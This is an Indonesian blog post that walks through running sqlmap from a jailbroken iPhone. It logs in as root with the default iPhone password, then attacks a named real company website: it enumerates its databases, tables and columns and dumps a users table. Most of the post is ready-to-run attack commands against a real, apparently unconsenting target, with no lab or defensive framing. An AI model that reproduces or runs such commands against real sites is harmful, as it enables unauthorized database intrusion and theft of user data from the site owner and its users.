\
Powered by Blogger.

Blog Archive

Tags:

sqli-lewat-iphone (baca)

By admin → Saturday, April 6, 2013
Assalamualaikum. Wr. Wb.
selamat malam warga Dunia Maya  smua... hai

sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya... ngopi

proses pembuatan dan peralatan yg ane pnya... mohon
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini


PHP Code:
http://ininjas.com/repo/ 
3. download and install dua program ini dari cydianya langsung.. seneng
PHP Code:
-Terminal Emulator-Python (biasanya dah langsung ke install)
-SQLmap 
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
PHP Code:
ketik su <enter>passwordalpine(password default root iPhone seluruh dunia...) 
sehati
6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmapls 
[Image: i6h6ki.png]
v
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html 
PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17Host IP79.170.44.145
Web ServerApache/2
Powered-byPHP/5.2.17 
8. kita mulai berdoa
kita ketik perintahnya...
PHP Code:
./sqlmap.py -
[Image: abjfrs.png]
v
9. kita coba inject kalem
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbskita coba cari nama databasenya.. 
[Image: 120ikhd.png]
v
[Image: 2luwbgx.png]
v
10. nah sekarang kita cari table user ato admin ato login ato apapun lah... ngakak
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer --tables 
[Image: 2ennx9s.png]
v
11. sekarang kita cari column dari tabel yang tadi kita dapet... detektif
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --columns 
[Image: 2u7rb5v.png]
v
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh.. belajar
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --dump 
[Image: ape52t.png]

Post Tags:

Ichsan Bahri

I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.

Website: http://sagoe.net/
Posted by admin at 1:25 AM

No Comment to " sqli-lewat-iphone (baca) "

Subscribe to: Post Comments ( Atom )